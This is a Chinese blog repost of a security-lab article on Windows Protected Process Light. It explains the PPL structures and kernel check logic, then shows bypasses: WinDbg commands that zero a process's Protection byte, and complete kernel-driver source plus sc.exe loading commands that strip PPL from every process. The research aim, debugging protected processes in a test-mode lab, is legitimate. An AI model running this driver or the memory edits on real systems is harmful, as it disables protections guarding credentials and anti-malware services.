Windows 的 PPL 安全机制和绕过

原创 已于 2024-01-10 19:19:21 修改 · 483 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #安全 #stm32

于 2023-08-09 17:03:42 首次发布

**作者:0x7F@知道创宇404实验室 **

0x00 前言

Windows 从 vista 版本引入一种进程保护机制(Process
Protection),用于更进一步的控制进程的访问级别,在此之前,用户只需要使用SeDebugPrivilege令牌权限即可获取任意进程的所有访问权限;随后
Windows8.1 在此进程保护的基础上,扩展引入了进程保护光机制(Protected Process
Light),简称PPL机制,其能提供更加细粒度化的进程访问权限控制,。

本文将介绍 Windows 的 PPL 安全机制,以及在实验环境下如何绕过该机制,从而实现对 PPL 的进程进行动态调试。

本文实验环境:

Windows 10 专业版 22H2
Visual Studio 2019

0x01 PPL机制

使用Process Explorer工具查看进程列表,我们可以看到 Windows 的部分核心进程设置了 PPL 保护:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qw2mTlk5-1691571820334)(https://image.3001.net/images/20230509/1683617971_6459f8b37d49aa878f60b.png!small)]

对于安全研究来说,PPL机制最直观的感受就是即便使用管理员权限也无法 attach 这个进程进行调试:
image

通过官网文档(<https://learn.microsoft.com/en-
us/windows/win32/procthread/zwqueryinformationprocess></https://learn.microsoft.com/en-
us/windows/win32/procthread/zwqueryinformationprocess)可以了解到>)可以了解到PS_PROTECTION的结构如下:

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;                  // Reserved
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

前 3 位包含进程保护的类型:

typedef enum _PS_PROTECTED_TYPE {
    PsProtectedTypeNone = 0,
    PsProtectedTypeProtectedLight = 1,
    PsProtectedTypeProtected = 2
} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;

后 4 位包含进程保护的签名者标识:

typedef enum _PS_PROTECTED_SIGNER {
    PsProtectedSignerNone = 0,
    PsProtectedSignerAuthenticode,
    PsProtectedSignerCodeGen,
    PsProtectedSignerAntimalware,
    PsProtectedSignerLsa,
    PsProtectedSignerWindows,
    PsProtectedSignerWinTcb,
    PsProtectedSignerWinSystem,
    PsProtectedSignerApp,
    PsProtectedSignerMax
} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

通过 WinDBG 进行本地内核调试,查看上图进程smss.exe(412)的内核对象EPROCESS可以查看PPL=0x61,如下:
image

PPL
机制在内核函数NtOpenProcess进行实现,当我们访问进程时最终都会调用该函数;NtOpenProcess位于ntoskrnl.exe内,结合符号表逆向如下:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UwKkD0W4-1691571820337)(https://image.3001.net/images/20230509/1683618004_6459f8d4a01514d5c5377.png!small)]

经过一系列的调用,最终进入到 PPL 检查的关键逻辑RtlTestProtectedAccess,其调用栈如下:
image

RtlTestProtectedAccess的判断逻辑如下:
image

其中Protection.Signer经过RtlProtectedAccess转换的权限如下:

PsProtectedSignerNone         0 => 0x0
PsProtectedSignerAuthenticode 1 => 0x2
PsProtectedSignerCodeGen      2 => 0x4
PsProtectedSignerAntimalware  3 => 0x108
PsProtectedSignerLsa          4 => 0x110
PsProtectedSignerWindows      5 => 0x13e
PsProtectedSignerWinTcb       6 => 0x17e
PsProtectedSignerWinSystem    7 => 0x1fe
PsProtectedSignerApp          8 => 0x0

实际NtOpenProcess中还有诸多条件影响 PPL
的检查,不过本文我们主要关注核心判断逻辑RtlTestProtectedAccess就可以了。

0x02 双机调试bypass

使用双机内核调试可以无视大多数的安全机制,这里我使用网络双机调试,成功连接被调试主机后,再进入到有 PPL
机制的smss.exe(412)的进程空间下,直接就可以正常调试:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jvKz1vj0-1691571820338)(https://image.3001.net/images/20230509/1683618034_6459f8f24b5346d76eaef.png!small)]

但是实际场景下双机调试可能受环境限制,同时双机调试也不如用户模式下方便,下面我们看看通过本地调试的方法来绕过 PPL 机制。

0x03 本地调试bypass

通过上文对 PPL 机制的介绍,我们知道 PPL
的标识位是以_PS_PROTECTION结构存放于EPROCESS进程对象中,虽然本地内核调试无法控制程序执行流,但可以修改内存值;那么我们可以先通过本地内核调试去除
PPL 标识,随后便可以在用户模式下调试目标进程。

配置好本地内核调试环境后,使用管理员权限启动 WinDBG,覆写smss.exe(412)进程的Protection = 0x00命令如下:

# 获取 smss.exe 进程的 EPROCESS 地址
lkd > !process 0 0 smss.exe
# 从 EPROCESS 获取 Protection 的偏移和值
lkd > dt nt!_eprocess ffffc40b2c45e080 Protection
lkd > db ffffc40b2c45e080+0x87a l1
# 将 Protection 值修改为 0x00
lkd > eb ffffc40b2c45e080+0x87a 0x00

执行如下:
image

随后我们再以管理员权限启动 WinDBG,attach 到目标进程上,可以成功进行调试:
image

0x04 工具化

根据本地内核调试去除 PPL
标识的思路,我们可以编写驱动程序如下,使用ZwQuerySystemInformation()遍历进程,使用PsLookupProcessByProcessId()获取进程的EPROCESS,随后按Protection的偏移将其内存值覆写为0x00

#include <ntifs.h>
#include <wdf.h>

#define EPROCESS_PROTECTION_OFFSET 0x87A        // windows10 professional 22H2

DRIVER_INITIALIZE DriverEntry;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemProcessInformation = 5,
    // ...
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    BYTE Reserved1[48];
    PVOID Reserved2[3];
    HANDLE UniqueProcessId;
    PVOID Reserved3;
    ULONG HandleCount;
    BYTE Reserved4[4];
    PVOID Reserved5[11];
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER Reserved6[6];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

NTSTATUS NTAPI ZwQuerySystemInformation(
    _In_      SYSTEM_INFORMATION_CLASS SystemInformationClass,
    _Inout_   PVOID                    SystemInformation,
    _In_      ULONG                    SystemInformationLength,
    _Out_opt_ PULONG                   ReturnLength
);

NTKERNELAPI UCHAR* PsGetProcessImageFileName(__in PEPROCESS Process);

VOID OnUnload(_In_ PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: unload driver\n"));
}

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath) {
    ULONG BufferSize = 0;
    NTSTATUS Status = STATUS_SUCCESS;
    PVOID Buffer = NULL;
    PSYSTEM_PROCESS_INFORMATION pInfo = NULL;

    UNREFERENCED_PARAMETER(DriverObject);
    UNREFERENCED_PARAMETER(RegistryPath);

    KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: driver entry\n"));

    // register unload function
    DriverObject->DriverUnload = OnUnload;

    // get size of SYSTEM_PROCESS_INFORMATION
    Status = ZwQuerySystemInformation(SystemProcessInformation, NULL, 0, &BufferSize);
    if (Status != STATUS_INFO_LENGTH_MISMATCH) {
        KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: ZwQuerySystemInformation get size failed status=0x%x\n", Status));
        goto _LABEL_EXIT;
    }

    // alloc memory and get SYSTEM_PROCESS_INFORMATION
    Buffer = ExAllocatePoolWithTag(PagedPool, BufferSize, '1gaT');
    if (Buffer == NULL) {
        KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: ExAllocatePoolWithTag failed\n"));
        goto _LABEL_EXIT;
    }
    Status = ZwQuerySystemInformation(SystemProcessInformation, Buffer, BufferSize, &BufferSize);
    if (Status != STATUS_SUCCESS) {
        KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: ZwQuerySystemInformation get info failed status=0x%x\n", Status));
        goto _LABEL_EXIT;
    }

    // traverse all processes and rewrite "Protection" to 0x00
    pInfo = (PSYSTEM_PROCESS_INFORMATION)Buffer;
    do {
        PEPROCESS Process = NULL;
        Status = PsLookupProcessByProcessId(pInfo->UniqueProcessId, &Process);
        if (NT_SUCCESS(Status)) {
            BYTE* Protection = (BYTE*)Process + EPROCESS_PROTECTION_OFFSET;
            if (*Protection != 0) {
                KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: rewrite %s[%d] Protection=0x%x to 0x00\n",
                    PsGetProcessImageFileName(Process), pInfo->UniqueProcessId, *Protection));
                *Protection = 0x00;
            }
        }
        else {
            KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "remove_ppl: PsLookupProcessByProcessId [%d] failed status=0x%x\n",
                pInfo->UniqueProcessId, Status));
        }

        pInfo = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pInfo + pInfo->NextEntryOffset);
    } while (pInfo->NextEntryOffset);

_LABEL_EXIT:
    if (Buffer != NULL) {
        ExFreePoolWithTag(Buffer, '1gaT');
    }
    return STATUS_SUCCESS;
}

成功编译后,将驱动程序注册为服务来启动运行(需设置主机为测试模式):

# 注册驱动程序为服务
sc.exe create remove_ppl type= kernel start= demand binPath= [src]remove_ppl.sys
# 查看服务信息
sc.exe queryex remove_ppl
# 启动驱动程序/服务
sc.exe start remove_ppl

运行驱动程序,并使用Process Explorer查看,所有进程的 PPL 标识都被去除了:
image

除了以上实验代码外,也可以参考更加完善的 PPL 控制工具:

0x0x References

<https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-
malware-services->
<https://learn.microsoft.com/en-
us/windows/win32/procthread/zwqueryinformationprocess>
<https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-
and-access-rights>
https://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/process_vista.doc
<https://www.crowdstrike.com/blog/evolution-protected-processes-part-1-pass-
hash-mitigations-windows-81/>
<https://www.crowdstrike.com/blog/evolution-protected-processes-
part-2-exploitjailbreak-mitigations-unkillable-processes-and/>
https://www.cnblogs.com/H4ck3R-XiX/p/15872255.html
https://www.cnblogs.com/revercc/p/16961961.html
https://itm4n.github.io/debugging-protected-processes/
https://paper.seebug.org/1892/
https://github.com/Mattiwatti/PPLKiller
https://github.com/itm4n/PPLcontrol

https://www.cnblogs.com/H4ck3R-XiX/p/15872255.html
https://www.cnblogs.com/revercc/p/16961961.html
https://itm4n.github.io/debugging-protected-processes/
https://paper.seebug.org/1892/
https://github.com/Mattiwatti/PPLKiller
https://github.com/itm4n/PPLcontrol

网络安全学习路线

这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qrBIf7ol-1691571820340)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]编辑

阶段一:基础入门

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9fgfriqx-1691571820340)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

网络安全导论

渗透测试基础

网络基础

操作系统基础

Web安全基础

数据库基础

编程基础

CTF基础

该阶段学完即可年薪15w+

阶段二:技术进阶(到了这一步你才算入门)

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kyEYwBGB-1691571820340)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

弱口令与口令爆破

XSS漏洞

CSRF漏洞

SSRF漏洞

XXE漏洞

SQL注入

任意文件操作漏洞

业务逻辑漏洞

该阶段学完年薪25w+

阶段三:高阶提升

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FUixjBgN-1691571820341)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

反序列化漏洞

RCE

综合靶场实操项目

内网渗透

流量分析

日志分析

恶意代码分析

应急响应

实战训练

该阶段学完即可年薪30w+

阶段四:蓝队课程

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PjTL1V9V-1691571820341)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

蓝队基础

蓝队进阶

该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。

攻防兼备,年薪收入可以达到40w+

阶段五:面试指南&阶段六:升级内容

img

需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

同学们可以扫描下方二维码获取哦!

13、突破微软 Defender for Endpoint 防护:实战指南
vscode6remote的博客
09-08 138
本文详细介绍了如何绕过微软 Defender for Endpoint(MDE)防护以获取目标系统的敏感信息。内容涵盖 MDE 的基本原理、尝试绕过其检测机制、访问 LSASS 进程提取凭证、分析 MDE 的工作机制及 PPL 保护的绕过方法。此外,还探讨了利用 TrustedInstaller 服务线程注入技术实现更隐蔽的攻击。文章旨在为安全研究人员提供技术参考,强调相关技术仅用于合法测试研究,并提出了加强系统安全性的建议。
【操作系统】进程管理
学习 & 分享 ~
07-06 1578
进程:资源分配的基本单位。计算机中已运行程序的实体,同一程序可产生多个进程,以允许同时有多位用户运行同一程序。线程:独立调度的基本单位。一个进程中可以有多个线程,共享进程资源。一个标准线程由 线程 ID,当前指令指针 PC,寄存器集合堆栈 组成。线程是进程中的一个实体,同属一个进程的线程共享进程环境,包括:进程代码段、进程的公有数据等。打开电脑的任务管理器,每个运行的应用都是一个进程: 【线程的组成部分】线程共享进程的:进程代码段,进程公有数据、进程当前目录等信息。除了以上共享资源,每个线程还有:【进程
SYSTEM_PROCESS_INFORMATION SYSTEM_THREAD_INFORMATION
angbagangzhe065140的博客
08-28 655
typedef ULONG KPRIORITY; typedef struct _CLIENT_ID { HANDLE UniqueProcess; HANDLE UniqueThread; } CLIENT_ID, *PCLIENT_ID; typedef enum _KWAIT_REASON { Executive, FreePage, PageI...
进程遍历-NtQuerySystemInformation枚举
hide_in_darkness的博客
06-07 1118
​ 数组中下一项的开头是上一项的地址加上 NextEntryOffset 成员中的值。​ HandleCount 成员包含有问题的进程正在使用的句柄总数;​ PeakWorkingSetSize 成员包含进程的工作集的峰值大小(以 KB 为单位)​ BasePriority 成员包含进程的基优先级,即在关联进程中创建的线程的起始优先级。​ PeakVirtualSize 成员包含进程使用的虚拟内存的峰值大小(以字节为单位)​ VirtualSize 成员包含进程使用的虚拟内存的当前大小(以字节为单位)
程序防多开之一:进程数量检测
RitMan的博客
12-11 2072
通过对系统内核函数的调用,实现对程序多开进行限制与检测.
win32 判断进程状态(挂起/运行中)、用API挂起/恢复进程
小流汗黄豆
08-09 5518
应用层判断进程是否挂起的多种方法调用API NtSuspendProcess()挂起进程
绕过PPL机制窃取凭证
摔不死的笨鸟的博客
11-14 357
使用LSA防护Mimikatz窃取密码攻击
域渗透——绕过LSA保护机制总结
灰太的表格的博客
08-06 1587
LSA绕过
Windows内核如何实现安全隔离防攻击机制?
最新发布
08-06
嗯,用户想了解Windows内核的安全隔离防攻击机制实现原理。这个问题涉及操作系统底层安全,专业性很强。用户可能是个安全研究员、...但需注意:**任何防护均可被绕过安全取决于最弱子系统的强度** [^3][^4]。 ---
PPLdump工具详解:通过userland漏洞转储PPL内存
4. @itm4nJames Forshaw:@itm4n是一个安全研究员工具开发者,而James Forshaw是安全领域的知名专家,曾多次在安全大会上发表关于绕过安全机制的研究成果。他们共同工作在安全领域,特别是在挖掘利用Windows...
注入Dll 阻止任务管理器结束进程 -- Win 10/11
溡漪幽博客
10-05 1175
资源管理器通过NtQuerySystemInformation获取进程信息,通过TerminateProcess以及EndTask等函数终止进程,我们可以通过挂钩途径中的多个R3函数实现在资源管理器中保护进程。可以看出该接口返回的结构体包含链表结构,我们可以通过断链方法隐藏进程,或者通过记录查找到的进程信息,在联合挂钩NtOpenProcess等函数来保护进程。其他部分不在详细叙述,给出完整代码,需要注意的是,该挂钩只适用于Taskmgr不适用于procexp等程序。
安全信息应用到以下对象时发生错误 拒绝访问_Windows访问令牌窃取攻防技术研究...
weixin_39614546的博客
12-06 3611
(本文转自安全客)在本文中,我们介绍了访问令牌窃取的相关概念,以及如何在winlogon.exe上利用该技术从管理员上下文中模拟SYSTEM访问令牌。MITRE ATT&CK将该技术归为Access Token Manipulation(访问令牌操控)类别。如果本地管理员账户因为某些组策略(Group Policy)设置无法获取某些权限,此时模仿SYSTEM访问令牌是非常有用的一种技术。比...
浅析Windows的访问权限检查机制
求索
03-18 2530
Author: DanielKing 0x00 简介 在操作系统中,当我们提到安全的时候,意味着有一些资源需要被保护,在Windows操作系统中,这些被保护的资源大多以对象(Object)的形式存在,对象是对资源的一种抽象。每个对象都可以拥有自己的安全描述符(Security Descriptor),用来描述它能够被谁、以何种方式而访问。这些对象是客体,那么访问这些对象的主体是什么呢?这些
windbg使用方法_两种最新Bypass ETW的方法
weixin_39668470的博客
11-22 1118
译文声明本文是翻译文章,文章原作者modexp,文章来源:modexp.wordpress.com原文地址:https://modexp.wordpress.com/2020/04/08/red-teams-etw/译文仅供参考,具体内容表达以及含义原文为准2020年4月7日,Dylan在其twitter上发布了一种绕过SysmonETW的通用方法,我们对其进行了跟踪研究。4月8日,...
函数ZwQuerySystemInformation小结
weixin_33906657的博客
08-07 380
函数存在于NTDLL.DLL动态链接库中。NTDLL.DLL负责ring3与ring0之间的通信。当使用子系统方式进行系统调用的时候,ntdll.dllSSDT会配合使用。 关于ZwQuerySystemInformation这个函数可以用来查询进程信息、内核信息、硬件信息(例如CPU数目)、句柄信息、时间信息等54个系统信息。 该函数的原型是 NTSTATUS WI...
WIN10绕过PPL保护
SHELLCODE_8BIT的博客
09-25 1826
Windows 8.1(Server 2012 R2)开始,Microsoft引入了一项称为LSA保护的功能。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码数据”。 我发现许多人都对这个技术存在误解,认为LSA Protection是阻止利用SeDebug或管理员权限从内存中提取凭证的攻击,例如使用Mimikatz来提取凭证。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困
PPL 中的取消操作
Fan0920的专栏
04-27 1577
关于PPL 中的取消操作
通过ZwQuerySystemInformation获取EPROCESS
weixin_33672109的博客
01-08 598
google一下,发现很多都是直接通过ZwQuerySystemInformation通过11号获取进程结构SYSTEM_PROCESS_INFORMATION,对于详细的进程信息表达不够。所以想要通过这个来查看详细的 EPROCESS 结构。方法可以通过 PsLookupProcessByProcessId 这个函数来获取。函数原型在下面给出。   typedef struct _SYS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值